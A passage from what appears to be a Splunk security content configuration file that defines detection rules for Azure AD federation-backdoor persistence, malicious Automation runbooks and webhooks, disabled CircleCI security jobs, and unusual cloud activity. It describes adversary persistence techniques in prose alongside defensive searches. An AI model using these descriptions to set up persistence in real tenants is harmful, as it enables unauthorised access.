organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the modification of the SourceAnchor (also called ImmutableId) attribute for an Azure Active Directory user. Updating this attribute is a step required to set up the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase(https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category. action.escu.known_false_positives = The SourceAnchor (also called ImmutableId) Azure AD attribute has legitimate uses for directory synchronization. Investigate and filter as needed. action.escu.creation_date = 2022-09-02 action.escu.modification_date = 2022-09-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure AD User ImmutableId Attribute Updated - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Azure AD", "Entra ID"] action.escu.analytic_story = ["Azure Active Directory Persistence"] action.risk = 1 action.risk.param._risk_message = The SourceAnchor or ImmutableID attribute has been modified for user $user$ by $initiatedBy$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 45}, {"risk_object_field": "initiatedBy", "risk_object_type": "other", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure AD User ImmutableId Attribute Updated - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the modification of the SourceAnchor (also called ImmutableId) attribute for an Azure Active Directory user. Updating this attribute is a step required to set up the Azure Active Directory identity federation backdoor technique discovered by security researcher Nestori Syynimaa. Similar to Active Directory, Azure AD uses the concept of domains to manage directories of identities. A new Azure AD tenant will initially contain a single domain that is commonly called the `cloud-only` onmicrosoft.com domain. Organizations can also add their registered custom domains to Azure AD for email addresses to match the organizations domain name. If the organization intends to use a third-party identity provider such as ADFS for authentication, the added custom domains can be configured as federated. An adversary who has obtained privileged access to an Azure AD tenant may leverage this technique to establish persistence and be able to authenticate to Azure AD impersonating any user and bypassing the requirement to have a valid password and/or perform MFA. action.notable.param.rule_title = Azure AD User ImmutableId Attribute Updated action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_monitor_aad` operationName="Update user" properties.targetResources{}.modifiedProperties{}.displayName=SourceAnchor | rename properties.* as * | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.modifiedProperties{}.newValue as modifiedProperties | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user values(modifiedProperties) as modifiedProperties by initiatedBy, src_ip, result, operationName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_user_immutableid_attribute_updated_filter` [ESCU - Azure Automation Account Created - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the creation of a new Azure Automation account within an Azure tenant. Azure Automation is a cloud-based automation platform that allows administrators to automate Azure management tasks and orchestrate actions across external systems within Azure using PowerShell and Python. Azure Automation can also be configured to automate tasks on on premise infrastructure using a component called a Hybrid Runbook Worker. Automation accounts serve as a container to isolate Automation resources, runbooks, assets, and configurations from the resources of other accounts. They allow administrators to separate resources into logical environments or delegated responsibilities. Adversaries or red teams who have obtained privileged access to an Azure tenant may create an Azure Automation account with elevated privileges to maintain persistence in the Azure tenant. A malicious Automation Runbook can be created to create Global Administrators in Azure AD, execute code on VMs, etc. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136", "T1136.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the creation of a new Azure Automation account within an Azure tenant. Azure Automation is a cloud-based automation platform that allows administrators to automate Azure management tasks and orchestrate actions across external systems within Azure using PowerShell and Python. Azure Automation can also be configured to automate tasks on on premise infrastructure using a component called a Hybrid Runbook Worker. Automation accounts serve as a container to isolate Automation resources, runbooks, assets, and configurations from the resources of other accounts. They allow administrators to separate resources into logical environments or delegated responsibilities. Adversaries or red teams who have obtained privileged access to an Azure tenant may create an Azure Automation account with elevated privileges to maintain persistence in the Azure tenant. A malicious Automation Runbook can be created to create Global Administrators in Azure AD, execute code on VMs, etc. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Audit events into your Splunk environment. Specifically, this analytic leverages the Azure Activity log category. action.escu.known_false_positives = Administrators may legitimately create Azure Automation accounts. Filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure Automation Account Created - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Azure Active Directory Persistence"] action.risk = 1 action.risk.param._risk_message = A new Azure Automation account $object$ was created by $user$ action.risk.param._risk = [{"risk_object_field": "object", "risk_object_type": "other", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure Automation Account Created - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136", "T1136.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the creation of a new Azure Automation account within an Azure tenant. Azure Automation is a cloud-based automation platform that allows administrators to automate Azure management tasks and orchestrate actions across external systems within Azure using PowerShell and Python. Azure Automation can also be configured to automate tasks on on premise infrastructure using a component called a Hybrid Runbook Worker. Automation accounts serve as a container to isolate Automation resources, runbooks, assets, and configurations from the resources of other accounts. They allow administrators to separate resources into logical environments or delegated responsibilities. Adversaries or red teams who have obtained privileged access to an Azure tenant may create an Azure Automation account with elevated privileges to maintain persistence in the Azure tenant. A malicious Automation Runbook can be created to create Global Administrators in Azure AD, execute code on VMs, etc. action.notable.param.rule_title = Azure Automation Account Created action.notable.param.security_domain = audit action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_audit` operationName.localizedValue="Create or Update an Azure Automation account" status.value=Succeeded | dedup object | rename claims.ipaddr as src_ip | rename caller as user | stats count min(_time) as firstTime max(_time) as lastTime values(object) as object by user, src_ip, resourceGroupName, object_path | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_automation_account_created_filter` [ESCU - Azure Automation Runbook Created - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the creation of a new Azure Automation Runbook within an Azure tenant. Azure Automation is a cloud-based automation platform that allows administrators to automate Azure management tasks and orchestrate actions across external systems within Azure. Azure Automation script files called Runbooks that can be written in PowerShell or Python. Adversaries or red teams who have obtained privileged access to an Azure tenant may create an Azure Automation Runbook that runs with elevated privileges to maintain persistence in the Azure tenant. A malicious Automation Runbook can be created to create Global Administrators in Azure AD, execute code on VMs, etc. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136", "T1136.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the creation of a new Azure Automation Runbook within an Azure tenant. Azure Automation is a cloud-based automation platform that allows administrators to automate Azure management tasks and orchestrate actions across external systems within Azure. Azure Automation script files called Runbooks that can be written in PowerShell or Python. Adversaries or red teams who have obtained privileged access to an Azure tenant may create an Azure Automation Runbook that runs with elevated privileges to maintain persistence in the Azure tenant. A malicious Automation Runbook can be created to create Global Administrators in Azure AD, execute code on VMs, etc. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Audit events into your Splunk environment. Specifically, this analytic leverages the Azure Activity log category. action.escu.known_false_positives = Administrators may legitimately create Azure Automation Runbooks. Filter as needed. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure Automation Runbook Created - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Azure Active Directory Persistence"] action.risk = 1 action.risk.param._risk_message = A new Azure Automation Runbook $object$ was created by $caller$ action.risk.param._risk = [{"risk_object_field": "object", "risk_object_type": "other", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure Automation Runbook Created - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136", "T1136.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the creation of a new Azure Automation Runbook within an Azure tenant. Azure Automation is a cloud-based automation platform that allows administrators to automate Azure management tasks and orchestrate actions across external systems within Azure. Azure Automation script files called Runbooks that can be written in PowerShell or Python. Adversaries or red teams who have obtained privileged access to an Azure tenant may create an Azure Automation Runbook that runs with elevated privileges to maintain persistence in the Azure tenant. A malicious Automation Runbook can be created to create Global Administrators in Azure AD, execute code on VMs, etc. action.notable.param.rule_title = Azure Automation Runbook Created action.notable.param.security_domain = audit action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_audit` operationName.localizedValue="Create or Update an Azure Automation Runbook" object!=AzureAutomationTutorial* status.value=Succeeded | dedup object | rename claims.ipaddr as src_ip | rename caller as user | stats count min(_time) as firstTime max(_time) as lastTime values(object) as object by user, src_ip, resourceGroupName, object_path | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_automation_runbook_created_filter` [ESCU - Azure Runbook Webhook Created - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the creation of a new Automation Runbook Webhook within an Azure tenant. Azure Automation is a cloud-based automation platform that allows administrators to automate Azure management tasks and orchestrate actions across external systems within Azure. Azure Automation script files called Runbooks that can be written in PowerShell or Python. One of the ways administrators can configure a Runbook to be executed is through HTTP Webhooks. Webhooks leverage custom unauthenticated URLs that are exposed to the Internet. An adversary who has obtained privileged access to an Azure tenant may create a Webhook to trigger the execution of an Automation Runbook with malicious code that can create users or execute code on a VM. This provides a persistent foothold on the environment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.004"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the creation of a new Automation Runbook Webhook within an Azure tenant. Azure Automation is a cloud-based automation platform that allows administrators to automate Azure management tasks and orchestrate actions across external systems within Azure. Azure Automation script files called Runbooks that can be written in PowerShell or Python. One of the ways administrators can configure a Runbook to be executed is through HTTP Webhooks. Webhooks leverage custom unauthenticated URLs that are exposed to the Internet. An adversary who has obtained privileged access to an Azure tenant may create a Webhook to trigger the execution of an Automation Runbook with malicious code that can create users or execute code on a VM. This provides a persistent foothold on the environment. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Audit events into your Splunk environment. Specifically, this analytic leverages the Azure Activity log category. action.escu.known_false_positives = Administrators may legitimately create Azure Runbook Webhooks. Filter as needed. action.escu.creation_date = 2023-12-20 action.escu.modification_date = 2023-12-20 action.escu.confidence = high action.escu.full_search_name = ESCU - Azure Runbook Webhook Created - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Azure Active Directory Persistence"] action.risk = 1 action.risk.param._risk_message = A new Azure Runbook Webhook $object$ was created by $caller$ action.risk.param._risk = [{"risk_object_field": "object", "risk_object_type": "other", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Azure Runbook Webhook Created - Rule action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the creation of a new Automation Runbook Webhook within an Azure tenant. Azure Automation is a cloud-based automation platform that allows administrators to automate Azure management tasks and orchestrate actions across external systems within Azure. Azure Automation script files called Runbooks that can be written in PowerShell or Python. One of the ways administrators can configure a Runbook to be executed is through HTTP Webhooks. Webhooks leverage custom unauthenticated URLs that are exposed to the Internet. An adversary who has obtained privileged access to an Azure tenant may create a Webhook to trigger the execution of an Automation Runbook with malicious code that can create users or execute code on a VM. This provides a persistent foothold on the environment. action.notable.param.rule_title = Azure Runbook Webhook Created action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `azure_audit` operationName.localizedValue="Create or Update an Azure Automation webhook" status.value=Succeeded | dedup object | rename claims.ipaddr as src_ip | rename caller as user | stats count min(_time) as firstTime max(_time) as lastTime values(object) as object by user, src_ip, resourceGroupName, object_path | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_runbook_webhook_created_filter` [ESCU - Circle CI Disable Security Job - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic searches for a specific behavior in CircleCI pipelines such as the disabling of security jobs. The detection is made by using a Splunk query that renames certain fields and retrieves values for specified job names, workflow IDs and names, user information, commit messages, URLs, and branches. Then, the query identifies mandatory jobs for each workflow and searches for instances where they were run. The search also identifies the phase of the pipeline as "build" and extracts the repository name from the URL using regular expressions. The detection is important because it detects attempts to bypass security measures in CircleCI pipelines, which can potentially lead to malicious code being introduced into the pipeline, data breaches, system downtime, and reputational damage. False positives might occur since legitimate use cases can require the disabling of security jobs. However, you can proactively monitor and identify any suspicious activity in the pipeline using this analytic and mitigate potential threats through early detection. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1554"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic searches for a specific behavior in CircleCI pipelines such as the disabling of security jobs. The detection is made by using a Splunk query that renames certain fields and retrieves values for specified job names, workflow IDs and names, user information, commit messages, URLs, and branches. Then, the query identifies mandatory jobs for each workflow and searches for instances where they were run. The search also identifies the phase of the pipeline as "build" and extracts the repository name from the URL using regular expressions. The detection is important because it detects attempts to bypass security measures in CircleCI pipelines, which can potentially lead to malicious code being introduced into the pipeline, data breaches, system downtime, and reputational damage. False positives might occur since legitimate use cases can require the disabling of security jobs. However, you can proactively monitor and identify any suspicious activity in the pipeline using this analytic and mitigate potential threats through early detection. action.escu.how_to_implement = You must index CircleCI logs. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-09-02 action.escu.modification_date = 2021-09-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Circle CI Disable Security Job - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = disable security job $mandatory_job$ in workflow $workflow_name$ from user $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Circle CI Disable Security Job - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1554"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `circleci` | rename vcs.committer_name as user vcs.subject as commit_message vcs.url as url workflows.* as * | stats values(job_name) as job_names by workflow_id workflow_name user commit_message url branch | lookup mandatory_job_for_workflow workflow_name OUTPUTNEW job_name AS mandatory_job | search mandatory_job=* | eval mandatory_job_executed=if(like(job_names, "%".mandatory_job."%"), 1, 0) | where mandatory_job_executed=0 | eval phase="build" | rex field=url "(?[^\/]*\/[^\/]*)$" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `circle_ci_disable_security_job_filter` [ESCU - Circle CI Disable Security Step - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects the disablement of security steps in a CircleCI pipeline. Addressing instances of security step disablement in CircleCI pipelines can mitigate the risks associated with potential security vulnerabilities and unauthorized changes. A proactive approach helps protect the organization's infrastructure, data, and overall security posture. The detection is made by a Splunk query that searches for specific criteria within CircleCI logs through a combination of field renaming, joining, and statistical analysis to identify instances where security steps are disabled. It retrieves information such as job IDs, job names, commit details, and user information from the CircleCI logs. The detection is important because it indicates potential security vulnerabilities or unauthorized changes to the pipeline caused by someone within the organization intentionally or unintentionally disabling security steps in the CircleCI pipeline.Disabling security steps can leave the pipeline and the associated infrastructure exposed to potential attacks, data breaches, or the introduction of malicious code into the pipeline. Investigate by reviewing the job name, commit details, and user information associated with the disablement of security steps. You must also examine any relevant on-disk artifacts and identify concurrent processes that might indicate the source of the attack or unauthorized change. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1554"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the disablement of security steps in a CircleCI pipeline. Addressing instances of security step disablement in CircleCI pipelines can mitigate the risks associated with potential security vulnerabilities and unauthorized changes. A proactive approach helps protect the organization's infrastructure, data, and overall security posture. The detection is made by a Splunk query that searches for specific criteria within CircleCI logs through a combination of field renaming, joining, and statistical analysis to identify instances where security steps are disabled. It retrieves information such as job IDs, job names, commit details, and user information from the CircleCI logs. The detection is important because it indicates potential security vulnerabilities or unauthorized changes to the pipeline caused by someone within the organization intentionally or unintentionally disabling security steps in the CircleCI pipeline.Disabling security steps can leave the pipeline and the associated infrastructure exposed to potential attacks, data breaches, or the introduction of malicious code into the pipeline. Investigate by reviewing the job name, commit details, and user information associated with the disablement of security steps. You must also examine any relevant on-disk artifacts and identify concurrent processes that might indicate the source of the attack or unauthorized change. action.escu.how_to_implement = You must index CircleCI logs. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-09-01 action.escu.modification_date = 2021-09-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Circle CI Disable Security Step - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Dev Sec Ops"] action.risk = 1 action.risk.param._risk_message = disable security step $mandatory_step$ in job $job_name$ from user $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Circle CI Disable Security Step - Rule action.correlationsearch.annotations = {"analytic_story": ["Dev Sec Ops"], "cis20": ["CIS 13"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1554"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `circleci` | rename workflows.job_id AS job_id | join job_id [ | search `circleci` | stats values(name) as step_names count by job_id job_name ] | stats count by step_names job_id job_name vcs.committer_name vcs.subject vcs.url owners{} | rename vcs.* as * , owners{} as user | lookup mandatory_step_for_job job_name OUTPUTNEW step_name AS mandatory_step | search mandatory_step=* | eval mandatory_step_executed=if(like(step_names, "%".mandatory_step."%"), 1, 0) | where mandatory_step_executed=0 | rex field=url "(?[^\/]*\/[^\/]*)$" | eval phase="build" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `circle_ci_disable_security_step_filter` [ESCU - Cloud API Calls From Previously Unseen User Roles - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects when a new command is run by a user, who typically does not run those commands. The detection is made by a Splunk query to search for these commands in the Change data model. Identifies commands run by users with the user_type of AssumedRole and a status of success. The query retrieves the earliest and latest timestamps of each command run and groups the results by the user and command. Then, it drops the unnecessary data model object name and creates a lookup to verify if the command was seen before. The lookup table contains information about previously seen cloud API calls for each user role, including the first time the command was seen and whether enough data is available for analysis. If the firstTimeSeenUserApiCall field is null or greater than the relative time of 24 hours ago, it indicates that the command is new and was not seen before. The final result table includes the firstTime, user, object, and command fields of the new commands. It also applies the security_content_ctime function to format the timestamps and applies a filter to remove any cloud API calls from previously unseen user roles. The detection is important because it helps to identify new commands run by different user roles. New commands can indicate potential malicious activity or unauthorized actions within the environment. Detecting and investigating these new commands can help identify and mitigate potential security threats earlier, preventing data breaches, unauthorized access, or other damaging outcomes. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = The following analytic detects when a new command is run by a user, who typically does not run those commands. The detection is made by a Splunk query to search for these commands in the Change data model. Identifies commands run by users with the user_type of AssumedRole and a status of success. The query retrieves the earliest and latest timestamps of each command run and groups the results by the user and command. Then, it drops the unnecessary data model object name and creates a lookup to verify if the command was seen before. The lookup table contains information about previously seen cloud API calls for each user role, including the first time the command was seen and whether enough data is available for analysis. If the firstTimeSeenUserApiCall field is null or greater than the relative time of 24 hours ago, it indicates that the command is new and was not seen before. The final result table includes the firstTime, user, object, and command fields of the new commands. It also applies the security_content_ctime function to format the timestamps and applies a filter to remove any cloud API calls from previously unseen user roles. The detection is important because it helps to identify new commands run by different user roles. New commands can indicate potential malicious activity or unauthorized actions within the environment. Detecting and investigating these new commands can help identify and mitigate potential security threats earlier, preventing data breaches, unauthorized access, or other damaging outcomes. action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen Cloud API Calls Per User Role - Initial` to build the initial table of user roles, commands, and times. You must also enable the second baseline search `Previously Seen Cloud API Calls Per User Role - Update` to keep this table up to date and to age out old data. You can adjust the time window for this search by updating the `cloud_api_calls_from_previously_unseen_user_roles_activity_window` macro. You can also provide additional filtering for this search by customizing the `cloud_api_calls_from_previously_unseen_user_roles_filter` action.escu.known_false_positives = . action.escu.creation_date = 2020-09-04 action.escu.modification_date = 2020-09-04 action.escu.confidence = high action.escu.full_search_name = ESCU - Cloud API Calls From Previously Unseen User Roles - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious Cloud User Activities"] action.risk = 1 action.risk.param._risk_message = User $user$ of type AssumedRole attempting to execute new API calls $command$ that have not been seen before action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Cloud API Calls From Previously Unseen User Roles - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud User Activities"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Change where All_Changes.user_type=AssumedRole AND All_Changes.status=success by All_Changes.user, All_Changes.command All_Changes.object | `drop_dm_object_name("All_Changes")` | lookup previously_seen_cloud_api_calls_per_user_role user as user, command as command OUTPUT firstTimeSeen, enough_data | eventstats max(enough_data) as enough_data | where enough_data=1 | eval firstTimeSeenUserApiCall=min(firstTimeSeen) | where isnull(firstTimeSeenUserApiCall) OR firstTimeSeenUserApiCall > relative_time(now(),"-24h@h") | table firstTime, user, object, command |`security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `cloud_api_calls_from_previously_unseen_user_roles_filter` [ESCU - Cloud Compute Instance Created By Previously Unseen User - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for cloud compute instances created by users who have not created them before. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]} action.escu.data_models = ["Change"] action.escu.eli5 = This search looks for cloud compute instances created by users who have not created them before. action.escu.how_to_implement = You must be ingesting the appropriate cloud-infrastructure logs Run the "Previously Seen Cloud Compute Creations By User" support search to create of baseline of previously seen users. action.escu.known_false_positives = It's possible that a user will start to create compute instances for the first time, for any number of reasons. Verify with the user launching instances that this is the intended behavior. action.escu.creation_date = 2021-07-13 action.escu.modification_date = 2021-07-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Cloud Compute Instance Created By Previously Unseen User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Cloud Cryptomining"] action.risk = 1 action.risk.param._risk_message = User $user$ is creating a new instance $dest$ for the first time action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 18}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 18}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Cloud Compute Instance Created By Previously Unseen User - Rule action.correlationsearch.annotations = {"analytic_story": ["Cloud Cryptomining"], "cis20": ["CIS 10"], "confidence": 60, "impact": 30, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count earliest(_time) as firstTime, latest(_time) as lastTime values(All_Changes.object) as dest from datamodel=Change where All_Changes.action=created by All_Changes.user 